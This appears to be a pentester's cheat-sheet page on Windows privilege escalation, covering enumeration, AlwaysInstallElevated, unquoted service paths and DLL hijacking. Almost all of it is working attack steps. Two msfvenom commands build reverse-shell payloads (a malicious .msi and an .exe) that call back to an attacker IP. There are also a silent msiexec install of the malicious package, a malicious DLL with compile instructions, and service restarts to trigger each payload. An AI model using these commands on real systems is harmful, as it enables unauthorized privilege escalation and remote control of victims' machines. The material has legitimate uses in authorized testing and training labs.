Privileges Escalation

Vulnerable Software

   1) wmic product get name,version,vendor
   2) wmic service list brief | findstrÂ  "Running"
   3) sc qc SERVICENAME
   4) Searchsploit, metasploit, Exploit-db, Github, Google

Quick Wins

1) schtasks /query /fo LIST /v
   2) AlwaysInstallElevated (Malicious .msi)
      1- reg query   HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
      2- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
      3- msfvenom -p windows/x64/shell_reverse_tcpLHOST=ATTACKING_10.10.65.26 LPORT=LOCAL_PORT -f msi -o malicious.msi
      4- msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Unquoted Service Path

1) wmic service get name,displayname,pathname,startmode
   2) check if can write to folder in path
   3) msfvenom -p windows/x64/shell_reverse_tcp LHOST=[KALI or AttackBox IP Address] LPORT=[The Port to which the reverse shell will connect] -f exe > executable_name.exe
   4) sc start unquotedsvc

DLL Hijacking

1) Check if can modify dll being used by exe
   2) Check Safe dll search to know where to put dll
      1- Or recreate enviorment and use ProcMon for testing
   3) write dll code:
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
   4) compile with : x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll	
   5) Place in location and restart dll service: sc stop dllsvc & sc start dllsvc

PreviousInternal Port Scanning NextALL IN ONE

Last updated 2 years ago

Was this helpful?